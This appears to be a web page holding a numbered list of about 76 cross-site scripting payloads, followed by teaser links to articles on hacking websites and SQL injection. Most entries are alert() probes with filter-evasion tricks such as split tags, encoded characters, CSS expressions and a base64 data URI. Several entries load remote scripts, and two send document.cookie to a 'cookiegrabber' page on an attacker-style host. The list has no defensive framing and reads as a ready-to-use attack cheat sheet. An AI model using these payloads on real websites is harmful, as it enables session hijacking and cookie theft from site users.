1. <script>alert(1);</script>
    2. 
	
  2. <script>alert('XSS');</script>
    3. 
	
  3. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
    4. 
	
  4. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
    5. 
	
  5. <scr<script>ipt>alert('XSS');</scr</script>ipt>
    6. 
	
  6. <script>alert(String.fromCharCode(88,83,83))</script>
    7. 
	
  7. <img src=foo.png onerror=alert(/xssed/) />
    8. 
	
  8. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
    9. 
	
  9. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
    10. 
	
  10. <marquee><script>alert('XSS')</script></marquee>
    11. 
	
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
    12. 
	
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
    13. 
	
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
    14. 
	
  14. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    15. 
	
  15. "><script>alert(0)</script>
    16. 
	
  16. <script src=http://yoursite.com/your_files.js></script>
    17. 
	
  17. </title><script>alert(/xss/)</script>
    18. 
	
  18. </textarea><script>alert(/xss/)</script>
    19. 
	
  19. <IMG LOWSRC=\"javascript:alert('XSS')\">
    20. 
	
  20. <IMG DYNSRC=\"javascript:alert('XSS')\">
    21. 
	
  21. <font style='color:expression(alert(document.cookie))'>
    22. 
	
  22. '); alert('XSS
    23. 
	
  23. <img src="javascript:alert('XSS')">
    24. 
	
  24. <script language="JavaScript">alert('XSS')</script>
    25. 
	
  25. [url=javascript:alert('XSS');]click me[/url]
    26. 
	
  26. <body onunload="javascript:alert('XSS');">
    27. 
	
  27. <body onLoad="alert('XSS');"
    28. 
	
  28. [color=red' onmouseover="alert('xss')"]mouse over[/color]
    29. 
	
  29. "/></a></><img src=1.gif onerror=alert(1)>
    30. 
	
  30. window.alert("Bonjour !");
    31. 
	
  31. <div style="x:expression((window.r==1)?'':eval('r=1;
    32. 
	
  32. alert(String.fromCharCode(88,83,83));'))">
    33. 
	
  33. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
    34. 
	
  34. "><script alert(String.fromCharCode(88,83,83))</script>
    35. 
	
  35. '>><marquee><h1>XSS</h1></marquee>
    36. 
	
  36. '">><script>alert('XSS')</script>
    37. 
	
  37. '">><marquee><h1>XSS</h1></marquee>
    38. 
	
  38. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
    39. 
	
  39. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
    40. 
	
  40. <script>var var = 1; alert(var)</script>
    41. 
	
  41. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
    42. 
	
  42. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
    43. 
	
  43. <IMG SRC='vbscript:msgbox(\"XSS\")'>
    44. 
	
  44. " onfocus=alert(document.domain) "> <"
    45. 
	
  45. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
    46. 
	
  46. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
    47. 
	
  47. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
    48. 
	
  48. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
    49. 
	
  49. <br size=\"&{alert('XSS')}\">
    50. 
	
  50. <scrscriptipt>alert(1)</scrscriptipt>
    51. 
	
  51. </br style=a:expression(alert())>
    52. 
	
  52. </script><script>alert(1)</script>
    53. 
	
  53. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    54. 
	
  54. [color=red width=expression(alert(123))][color]
    55. 
	
  55. <BASE HREF="javascript:alert('XSS');//">
    56. 
	
  56. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
    57. 
	
  57. "></iframe><script>alert(123)</script>
    58. 
	
  58. <body onLoad="while(true) alert('XSS');">
    59. 
	
  59. '"></title><script>alert(1111)</script>
    60. 
	
  60. </textarea>'"><script>alert(document.cookie)</script>
    61. 
	
  61. '""><script language="JavaScript"> alert('X \nS \nS');</script>
    62. 
	
  62. </script></script><<<<script><>>>><<<script>alert(123)</script>
    63. 
	
  63. <html><noalert><noscript>(123)</noscript><script>(123)</script>
    64. 
	
  64. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    65. 
	
  65. '></select><script>alert(123)</script>
    66. 
	
  66. '>"><script src = 'http://www.site.com/XSS.js'></script>
    67. 
	
  67. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
    68. 
	
  68. <SCRIPT>document.write("XSS");</SCRIPT>
    69. 
	
  69. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
    70. 
	
  70. ='><script>alert("xss")</script>
    71. 
	
  71. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
    72. 
	
  72. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
    73. 
	
  73. ">/PlanetCreator/><script>alert(document.cookie)</script><script   src="http://www.site.com/XSS.js"></script>
    74. 
	
  74.  ">/PlanetCreator/><script>alert(document.cookie)</script>
    75. 
	
  75. src="http://www.site.com/XSS.js">
    76. 
	
  76. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
    77.

Explore More

How to hack a website? – Tips and tricks

Here are the most common techniques used to hack a website Hacking sites that are least protected by password – By pass authentication It’s the webmaster’s nightmare, hackers accessing the

Read More

How to prevent SQL Injection

SQL Injection: What It Is There was once a famous doctor that had it completely right: never trust your patients. Now this doctor may have only been a sitcom doctor

Read More

critical SQL injection (vulnerability) on Dhamma Web http://www.dhammaweb.net

PlanetCreator.Net’s Security Team member zai22 reported another critical SQL injection (vulnerability) on Dhamma Web http://www.dhammaweb.net SQL injection is a code injection technique that exploits a security vulnerability occurring in the

Read More